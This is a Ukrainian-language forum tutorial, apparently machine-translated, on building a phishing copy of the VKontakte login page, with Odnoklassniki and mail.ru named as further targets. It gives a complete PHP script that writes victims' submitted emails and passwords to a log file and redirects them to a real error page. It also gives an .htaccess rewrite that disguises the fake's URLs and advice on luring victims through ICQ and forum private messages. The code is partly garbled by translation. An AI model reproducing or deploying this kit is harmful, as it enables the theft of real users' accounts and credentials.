Фейк на швидку руку
[INtrO]
Робити було нечаго, справа була ввечері .... Власне на першу мою статтю (першу на антічате), потягнув мене той факт, що в розділі купи / продай / обменя / кинь по крупному є тема, в якій один Хеккер продовать фейки аж по 10 ВМЗ, та й часто просять створити той чи інший фейк ...Я ж розповім однією статтею якомога забацать універсальний фейк майже під усе, що угондо! Покажу на прикладі фейк вконтакте.
[SeaRchINg]
І так, 1 що нам потрібно, так це вибрати жертворесурс і зібрати всю потрібну нам інфу, а нам потрібна толька копія деяких страніц.Ідем на vkontakte.ru через Operu (!). Жмякайте кнопочку вхід, потрапляємо на логін.пхп, її і візьмемо за індекс нашого фейк. Тиснемо в опері: Фаил -> Зберегти як -> У відкрилися діалозі під назвою вибираємо (за замовчуванням там стоїть Веб Архів ....) "HTML Фаил з зображеннями", і обезательно графу Ім'я файлу пишемо index (або login.htm - в залежності від сторінки)
Далі вводимо туди нереальні дані і потрапляємо на сторінку, на якій написано
Такий поштову адресу не зареєстрований, або пароль невірний.
Зберігаємо її точно так же, т ільки замість index пишемо bad.
Далі вбиваємо в Google.ru фразу Vkontakte.ru, тиснемо Додаткові результати з vkontakte.ru »і іщім щось пов'язане з ерором контакту ... На вторйо сторінки я знайшов VKontakte | Error (http://vkontakte.ru/blank.php?code=10)- запам'ятовуємо, нам знадобитися ця посилання
Усе, все що нам треба для фейк від ресурсу, у нас вже є.
[CoDiNg]
Такс, тепер іследуем форму логіна. Відкриваємо наш index.html і шукаємо форму входу.<Form method = "post" name = "login" id = "login" action = "login.php"> <Input type = "hidden" name = "success_url" id = "success_url" value = ""> <Input type = "hidden" name = "fail_url" id = "fail_url" value = ""> <Input type = "hidden" name = "try_to_login" id = "try_to_login" value = "1"> <Table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%"> <Tr> <Td width = "100px"> <Span class = "grey"> Email: </ span> </ Td> <Td> <Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" /> <Td> </ Tr> <Tr> <Td> <Span class = "grey"> Пароль: </ span> </ Td> <Td> <Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" /> </ Td> </ Tr> <Tr> <Td> & Nbsp; </ Td> <Td> <Input style = "margin-top: 1px; vertical-align: middle;" type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Чужий комп'ютер </ small> </ Td> </ Tr> <Tr> <Td> & Nbsp; </ Td> <Td>Звідси запам'ятовуємо 3 речі:
<Form method = "post" name = "login" id = "login" action = "login.php">
<Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Саме в цих 3 речах заключається перша частина унікальності, на будь-який соціалці або емайл або ще де небудь, скрізь форма входу (поля), будуть в такому види (ну тільки назва полів будить відрізнятися), наприклад у однокласників це <Input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = "st.password">
Тобто просто отличаеться назву полів, елементами дизайну-но функція у всіх одна і таж. Тепер ми створюємо пхп файл, і називаємо його наприклад login.php, його вміст:
PHP Код:
<? phpВласне дивимося на скрипт, пару строчег, але це цілком нормальний фейк, його функціонал:
/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt", "at");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email']) &&! empty ($ _POST [ 'password'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'password']. "\ n");
header ( "Location: http: //");
} Else {
header ( "Location: http: //");
}
flock ($ f, 3);
fclose ($ f);
?>
Збереження переданих змінних, їх перевірка, редирект в залежності від перевірки.
І так, тепер повертаємося до тих 3 рядках:
<form method = "post" name = "login" id = "login" action = "login.php">
тут у нас все в порядки, ім'я нашого скрипта совподает з ім'ям їхнього, нобивает що і не співпаде, тоді замінюємо його або ж переіміновиваем наш. <Input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<Input class = "inputText" type = "password" name = "pass" value = "" id = "pass" size = "25" />
Звідси нам потрібно name = "email" і name = "pass"
Вставляємо їх у наш скрипт в потрібне місце
<? phpХто не помітив, це $ _POST [ 'email'] і $ _POST [ 'pass']
/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt", "at");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'pass']. "\ n");
header ( "Location: http: //");
} Else {
header ( "Location: http: //");
}
flock ($ f, 3);
fclose ($ f);
?>
Далі дивимося скрип, тут стаіт функція IF ELSE, і прегматч, тобто якщо поле емайл відповідає емайл (ника@мыло.ру, а не як водять ивпмдвгк), і поле пароль не порожнє, то виполняеться перший редирект, якщо ж Емаіл не відповідає або поле пас пусте, то на другий редирект. З цього випливає, що якщо Челл ввів мило і щось схоже на пас, то кидаємо його на сторінку з ерором http://vkontakte.ru/blank.php?code=10, а якщо ввів херню (ось тут нам і знадобилася копія сторінки bad.html? коли ми вводили невірні дані), то кидаємо його назад, тобто вписуємо bad.htm.
PHP Код:
<? phpСохраняем.Заліваем всю лабуду на сервер (login.php, index.htm + папка з файлами, bad.htm + папка з файлами), створюємо файіл log.txt (раджу своє унікальне ім'я придумати. Не забудьте в скрипті змінити), ставимо на нього chmod777.
/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt", "at");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'pass']. "\ n");
header ( "Location: http://vkontakte.ru/blank.php?code=10");
} Else {
header ( "Location: bad.htm");
}
flock ($ f, 3);
fclose ($ f);
?>
3) невеликий апдейт ...
Цей апдейт підійде дуже дл СІ, в корені на фтп створюємо фаил .htaccess з наступним змістом:
RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]
УВАГА!!!
! index \ .htm -на цей фаил ссилаеться редирект, якщо ж у вас фейк допустимо login.html. то відповідно вам потрібно перейменувати індекс в логін.
Такс, даний фаил нам дає посилання більш якісно газліва, а саме:
вашфейк.ру / будь-який текст, тобішь знаючи посилання структуру согдаваемого фейк, наприклад контакту, ми можемо зробити так:
вашфейк.ру / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6і впарити це по асьці))) погодьтеся. менш помітний тепер фейк))
От і все
[THe eND] Власне що унікального, а то що ви можете зайти на на однокласників, так само зберегти сторінку, вписати змінні, замінити урли (ось відразу даю http://odnoklassniki.ru/dk?st.cmd=error) і все, обсолютно так само зайти на майіл.ру, зберегти змінні і замінити і все))) Єдине, що вам може знадобитися-це креативність, добустім зберігати не головну сторінку, а сторінку входа.Ви так само можете зробити будь-який форум, якщо ви допустимо хочете отримати аккаунт ( відправляєте в пм
<a href="фейк"> посилання на тему </a>, А в фейк вказуєте цю тему для перенаправлення.
Коментарі
Коментуючи, пам'ятайте про те, що зміст і тон Вашого повідомлення можуть зачіпати почуття реальних людей, проявляйте повагу та толерантність до своїх співрозмовників навіть у тому випадку, якщо Ви не поділяєте їхню думку, Ваша поведінка за умов свободи висловлювань та анонімності, наданих інтернетом, змінює не тільки віртуальний, але й реальний світ. Всі коменти приховані з індексу, спам контролюється.